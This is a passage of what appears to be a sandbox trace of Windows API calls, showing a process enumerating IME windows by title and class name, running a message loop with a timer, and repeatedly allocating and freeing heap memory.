[0134.000] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.001] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.001] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.001] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.001] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.001] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.001] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.002] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.002] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.002] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.002] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.002] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.002] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.002] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.003] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.003] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.004] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.004] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.004] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.004] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.004] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.004] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.005] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.005] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.005] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.005] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.005] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.006] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.006] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.006] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.006] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.006] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.006] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.007] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.007] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.007] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.007] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.007] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.007] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.008] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.008] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.008] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.008] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.008] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.008] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.008] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.009] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.009] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.009] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.009] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.009] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.049] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.049] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.049] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.049] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.050] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.050] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.050] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.050] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0134.050] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0134.051] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.051] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.051] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.051] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.051] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.051] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.052] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.052] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.052] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.052] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.052] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.052] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.052] GetWindowTextW (in: hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0134.053] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0134.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0134.053] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0134.053] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0134.054] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0134.054] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0134.054] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0134.054] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.054] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0134.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0134.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0134.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5f0 | out: hHeap=0x12c0000) returned 1 [0134.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0134.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0134.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0134.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0134.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0134.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0134.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0134.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0134.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0134.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0134.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0134.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0134.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0134.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0134.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0134.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0134.062] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0134.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.063] HeapFree (in: hHeap=0x12c0000, 